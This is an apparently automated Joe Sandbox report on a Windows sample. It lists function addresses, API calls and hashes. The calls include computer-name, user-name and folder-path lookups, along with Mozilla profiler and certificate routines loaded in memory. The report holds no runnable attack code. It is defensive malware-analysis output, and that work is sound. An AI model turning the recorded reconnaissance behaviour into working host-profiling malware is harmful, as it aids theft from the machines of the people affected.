Opcode Fuzzy Hash: 8b2198729915d841949b5331758c8eb20c54c86fe414c6601b3bdfec23db4772
Instruction Fuzzy Hash: 9AF0E971641208BBE7149BA49C59FABB7ECE705B15F300448F504E3380D5715E00CB50

Function 00998D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00981B54,?,?,009A564C,?,?,009A0E1F), ref: 00998D9F

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d9c4724d462ccf372d537e7afcaf7329efd6e1bacf3dc6b6e3ae1dc63d1761f9
Instruction ID: d7c2099eb749f77fe5e1bcabba52f21877493326df0bd0dd4c09a7bddae73f51
Opcode Fuzzy Hash: d9c4724d462ccf372d537e7afcaf7329efd6e1bacf3dc6b6e3ae1dc63d1761f9
Instruction Fuzzy Hash: 78F01571C0020CEBCF00EFA8D5496DDBB78EB11310F108199E8266B2C0DB345A45DB81

Function 00998DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00998E0B

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 70a306cb244d967e6d0d42f07473355c436e97d7ffc7c8b6f11fb14b1ef79d51
Instruction ID: 8b21f35ddfa306a6da50ee185da1c3f4b7d1e8ffd6bbb318abc8a7accc8e46ca
Opcode Fuzzy Hash: 70a306cb244d967e6d0d42f07473355c436e97d7ffc7c8b6f11fb14b1ef79d51
Instruction Fuzzy Hash: 39E0123194034C6BDB51DB94CC96FAE737CDB44B01F004295BA0C5B1C0DE70AB858B91

Function 00981190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 009978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00997910
Part of subcall function 009978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00997917
Part of subcall function 009978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0099792F

Part of subcall function 00997850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009811B7), ref: 00997880
Part of subcall function 00997850: RtlAllocateHeap.NTDLL(00000000), ref: 00997887
Part of subcall function 00997850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0099789F

ExitProcess.KERNEL32 ref: 009811C6

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 27c9d5f084875ed81b2b2a0b69e94a626b01455e3a9e0ed89aba5a7841c13745
Instruction ID: 2bca54e51f1683ed27c1de6f98293d96ef12f29694749ba419cdb611ecd97b21
Opcode Fuzzy Hash: 27c9d5f084875ed81b2b2a0b69e94a626b01455e3a9e0ed89aba5a7841c13745
Instruction Fuzzy Hash: 72E012B592430553CE0073F9AC4FF2B369C5B5934DF040429FA05D3202FE25E801867A

Function 00998E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00998E52

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: fb5d20b6727c8dc80028d553edd38e7ab726d7eab4bc6dc013d8bae86a4e2975
Instruction ID: 4939901725ef1d3d13ec3e31b437cf640e47ffbbda29a956d3ff522273cdf21c
Opcode Fuzzy Hash: fb5d20b6727c8dc80028d553edd38e7ab726d7eab4bc6dc013d8bae86a4e2975
Instruction Fuzzy Hash: 0C01F670A04108EFDF05DF98D5A9BADBBB5EF05308F288488E9056B390C7756F85DB85

Non-executed Functions

Function 6CCA5440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CCA5492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCA54A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCA54BE
__Init_thread_footer.LIBCMT ref: 6CCA54DB

Part of subcall function 6CCCAB3F: EnterCriticalSection.KERNEL32(6CD1E370,?,?,6CC93527,6CD1F6CC,?,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB49
Part of subcall function 6CCCAB3F: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC93527,6CD1F6CC,?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCAB7C

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

GetCurrentThreadId.KERNEL32 ref: 6CCA54F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6CCA5516
GetCurrentThreadId.KERNEL32 ref: 6CCA556A
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCA5577
moz_xmalloc.MOZGLUE(00000070), ref: 6CCA5585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6CCA5590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6CCA55E6
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCA5606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCA5616

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

GetCurrentThreadId.KERNEL32 ref: 6CCA563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCA5646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6CCA567C
free.MOZGLUE(?), ref: 6CCA56AE

Part of subcall function 6CCB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
Part of subcall function 6CCB5E90: memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
Part of subcall function 6CCB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6CCA56E8
GetCurrentThreadId.KERNEL32 ref: 6CCA5707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6CCA570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6CCA5729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6CCA574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6CCA576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6CCA5796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6CCA57B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6CCA57CA

Strings

GeckoMain, xrefs: 6CCA5554, 6CCA55D5
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6CCA5D1C
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6CCA5D24
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6CCA5CF9
MOZ_BASE_PROFILER_LOGGING, xrefs: 6CCA54B9
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CCA5724
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CCA5766
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CCA57C5
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6CCA5BBE
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6CCA5AC9
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6CCA584E
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CCA548D
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6CCA57AE
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6CCA5B38
MOZ_PROFILER_STARTUP, xrefs: 6CCA55E1
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6CCA5717
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CCA54A3
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6CCA5D2B
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6CCA5749
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6CCA5C56
MOZ_BASE_PROFILER_HELP, xrefs: 6CCA5511
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6CCA5D01
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CCA5791
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6CCA56E3
[I %d/%d] profiler_init, xrefs: 6CCA564E

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: a1bddf1191e7c98fab44803d452362f1475016e9a7e4f97efda9c59f8d406deb
Instruction ID: fb27514eb8a561072fa39f58e19fd429dfc59717bca50c900935e932cc2925ae
Opcode Fuzzy Hash: a1bddf1191e7c98fab44803d452362f1475016e9a7e4f97efda9c59f8d406deb
Instruction Fuzzy Hash: C12213B4A08B019FF7009FB5941975A77B8AF86308F048529FA4697F91FB31D84ACB53

Function 6CCA6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CCA6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CCA6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6CCA6D26

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CCA6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CCA6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CCA6D73
free.MOZGLUE(00000000), ref: 6CCA6D80
CertGetNameStringW.CRYPT32 ref: 6CCA6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6CCA6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CCA6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CCA6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6CCA6E10
CryptMsgClose.CRYPT32(00000000), ref: 6CCA6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6CCA6E34
CreateFileW.KERNEL32 ref: 6CCA6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6CCA6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CCA6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CCA709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CCA7103
free.MOZGLUE(00000000), ref: 6CCA7153
CloseHandle.KERNEL32(?), ref: 6CCA7176
__Init_thread_footer.LIBCMT ref: 6CCA7209
__Init_thread_footer.LIBCMT ref: 6CCA723A
__Init_thread_footer.LIBCMT ref: 6CCA726B
__Init_thread_footer.LIBCMT ref: 6CCA729C
__Init_thread_footer.LIBCMT ref: 6CCA72DC
__Init_thread_footer.LIBCMT ref: 6CCA730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6CCA73C2
VerSetConditionMask.NTDLL ref: 6CCA73F3
VerSetConditionMask.NTDLL ref: 6CCA73FF
VerSetConditionMask.NTDLL ref: 6CCA7406
VerSetConditionMask.NTDLL ref: 6CCA740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CCA741A
moz_xmalloc.MOZGLUE(?), ref: 6CCA755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CCA7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CCA7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CCA7598
free.MOZGLUE(00000000), ref: 6CCA75AC

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

Strings

(, xrefs: 6CCA768A
SHA256, xrefs: 6CCA6EC0
wintrust.dll, xrefs: 6CCA72CD
CryptCATAdminReleaseCatalogContext, xrefs: 6CCA72C8

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 01cc2d5ce36010761d16f1c505fb1123f98822c09f03d9566b878f077c389945
Instruction ID: 1ac1d1f42e7504315a7328c02273903a9d956dc79b4d6b7ca26ab7d64f22fba3
Opcode Fuzzy Hash: 01cc2d5ce36010761d16f1c505fb1123f98822c09f03d9566b878f077c389945
Instruction Fuzzy Hash: 6852A6B1A002159FFB21DF64CC89BAAB7BDFF45704F104199E60997A40EB70AE86CF51

Function 6CCD0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CCD0F1F
LeaveCriticalSection.KERNEL32(?), ref: 6CCD0F99
memcpy.VCRUNTIME140(?,?,?), ref: 6CCD0FB7
EnterCriticalSection.KERNEL32(?), ref: 6CCD0FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6CCD1031
LeaveCriticalSection.KERNEL32(?), ref: 6CCD10D0
EnterCriticalSection.KERNEL32(?), ref: 6CCD117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6CCD1C39
EnterCriticalSection.KERNEL32(6CD1E744), ref: 6CCD3391
LeaveCriticalSection.KERNEL32(6CD1E744), ref: 6CCD33CD
LeaveCriticalSection.KERNEL32(?), ref: 6CCD3431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCD3437

Strings

Compile-time page size does not divide the runtime one., xrefs: 6CCD3946
